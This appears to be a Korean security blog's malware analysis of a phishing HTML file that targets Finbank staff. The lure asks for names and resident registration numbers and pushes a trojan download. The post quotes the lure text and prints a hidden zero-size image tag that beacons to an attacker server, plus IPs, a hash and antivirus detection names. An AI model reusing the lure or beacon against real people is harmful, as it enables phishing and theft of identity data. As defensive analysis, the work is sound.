꿈을꾸는 파랑새

오늘은 핀뱅크 개인정보 탈취 목적으로 제작된 악성코드인 이자조회.html 에 대해 글을 적어 보겠습니다.
HTML(하이퍼텍스트 마크업 언어, HyperText Markup Language)는 웹 페이지를 작성하는 데 사용되는 표준 마크업 언어입 HTML은 웹 페이지의 구조와 콘텐츠를 정의하려고 사용되며, 웹 브라우저에서 웹 페이지를 렌더링하는 데 사용하며 HTML은 웹 페이지의 텍스트, 이미지, 링크, 비디오, 오디오, 양식 등 다양한 요소를 포함할 수 있습니다.
일단 해당 악성코드가 포함된 변동금리 조회를 실행하면 다음과 같은 화면이 나오는 것을 확인할 수가 있습니다.
입력정보 유출방지를 위하여 키보드 보안 프로그램을 설치 바랍니다.
그리고 확인을 눌러주면 다음과 같은 악성코드를 다운로드 합니다.
Financial_KeyCrypt.exe(MD5:eff4984fba1958e9b5609f46e4f70d5d) 이며 해당 html 에 보면 Financial_KeyCrypt.exe를 다운로드 하게 되어져 있습니다.
내용은 다음과 같습니다.

변동금리 이자 조회 악성코드
변동금리 이자 조회 악성코드

사내 협약 대줄 금리 인상 안내 
변동금리 이자조회
대출금의 이자조회 및 납부하실 가상계좌를 조회하는 화면입니다.
조회를원하시면 성명과 주민번호 먼저 입력하세요.
대출계좌번호를 확인하시려면 여기를 클릭하여 주시기 바랍니다.
성함을 입력해 주세요 ex홍길동) 
주민등록번회/외국인등록번호 
인터넷연결이 불안정하거나 보안프로그램으로 인해 다운로드되지 않을 수 있습니다.
1)인터넷 연결에 문제가 없는지 확인합니다.
2)브라우처를 재시작하거나 새로고침하여 다운로드를 재시작합니다
3)보안 프로그램에 의해 차딘되었는지 확인합니다. 
본 메일은발신전용 입니다.
변동금리 이자조회에 관련해 궁금한 점이 있으시면 도움말을 확인해 보세요.

Financial_KeyCrypt.exe 다운로드 자바스크립트
Financial_KeyCrypt.exe 다운로드 자바스크립트

해당 웹 소스를 보면 다음과 같이 인터넷 주소가 포함된 것을 확인할 수가 있습니다.

이미지 다운로드를 위한 사이트
이미지 다운로드를 위한 사이트

<img src="http://210.127.188(.)240:8083/welcome.do?q=qYcBO0jB36DpaRyrb7mw
/t8dflgCDE8e+aNDuYTThjchfAlCH(E)AGduas9Y8heRDSez3zVbu2e+clXI+gPhllXw==
" width="0" height="0">

설명

제공된 코드는 HTML 이미지 태그(<img>)를 사용하여 외부 웹 페이지(http://210.127.188(.)240:8083/welcome.do?q=qYcBO0jB36DpaRyrb7mw/t8dflgCDE8e(+)aNDuYTThjchfAlCHEAGduas(9)Y8heRDSez3zVbu2e+clXI+gPhllXw==)를 로드 하고 해당 페이지에 대한 이미지를 표시함
이미지 태그(<img>)를 사용하면 웹 페이지에 이미지를 표시할 수 있으며 src 속성에 이미지 파일의 경로 또는 URL을 지정합니다. 여기서는 src 속성에 외부 URL(http://210.127.188(.)240:8083/welcome.do?q=qYcBO0jB36DpaRyrb7mw/t8dflgCDE8e+aNDuYTThjchfAlCHEAGduas9Y8heRDSez3zVbu2e+clXI+gPhllXw==)을 지정하고 있습니다.
그러나 주목해야 할 중요한 점은 width와 height 속성이 0으로 설정되어 있으므로 해당 이미지는 화면에 표시되지 않으며 width와 height가 0으로 설정되면 이미지의 크기가 0x0 픽셀로 되므로 화면에는 아무것도 나타나지 않을 것이고 q=qYcBO0jB36DpaRyrb7mw/t8dflgCDE8e(+)aNDuYTThjchfAlCHEAG(d)uas9Y8heRDSez3zVbu2e+clXI+gPhllXw==
와 같은 쿼리 문자열이 포함되어 있는데 해당 부분은 해당 웹 페이지로 전달되는 데이터 또는 매개변수를 나타낼 수 있습니다.
해당 코드를 통해 이미지가 표시되지 않고 웹 페이지(http://210.127.188(.)240:8083/welcome.do) 로 요청이 발생하며 쿼리 문자열을 전달
이렇게 작동을 하면 일단 해당 악성코드는 기본적으로 윈도우 환경에서만 작동하게 돼 있습니다.

사용하는 IP

23(.)56.204(.)161
210.127.188(.)240
23.212.110(.)162
23.212.110(.)144

일단 해당 악성코드는 일단 html 파일은 바이러스토탈에서 어느 보안 업체에서 탐지하지 않고 있으며 inancial_KeyCrypt.exe 파일은 2023-09-05 07:45:23 UTC 기준으로 탐지하는 보안 업체들은 다음과 같습니다.
ALYac:Gen:Variant.Jatif.7199
Arcabit:Trojan.Jatif.D1C1F
Avast:Win32:Evo-gen [Trj]
AVG:Win32:Evo-gen [Trj]
BitDefender:Gen:Variant.Jatif.7199
Cybereason:Malicious.fba195
Cylance:Unsafe
Cynet:Malicious (score: 100)
Cyren:W32/Khalesi.L.gen!Eldorado
DeepInstinct:MALICIOUS
Elastic:Malicious (high Confidence)
Emsisoft:Trojan.LockScreen (A)
eScan:Gen:Variant.Jatif.7199
ESET-NOD32:A Variant Of Win32/LockScreen.BSI
Fortinet:W32/LockScreen.BPL!tr
GData:Gen:Variant.Jatif.7199
Google:Detected
Ikarus:Trojan.Win32.LockScreen
Jiangmin:Trojan.Khalesi.bhxd
Kaspersky:HEUR:Trojan.Win32.Khalesi.gen
Malwarebytes:LockScreen.Trojan.ScreenLocker.DDS
MAX:Malware (ai Score=87)
Microsoft:Trojan:Win32/Wacatac.B!ml
Rising:Trojan.LockScreen!8.1AF (TFE:5:J7NbNnsrQ7D)
SentinelOne (Static ML):Static AI-Suspicious PE
Symantec:ML.Attribute.HighConfidence
Trellix (FireEye):Generic.mg.eff4984fba1958e9
VBA32:BScope.Trojan.Khalesi
VIPRE:Gen:Variant.Jatif.7199
이며 해당 악성코드 를 보면 html 내용만 보면 핀뱅크 직원들을 상대로 피싱(Phishing)하는 있는 것으로 추측됩니다. 아무튼, 기본적인 보안 수칙을 잘 지키면 피해를 최소화할 수가 있습니다.

그리드형

공유하기

facebook twitter kakaoTalk kakaostory naver band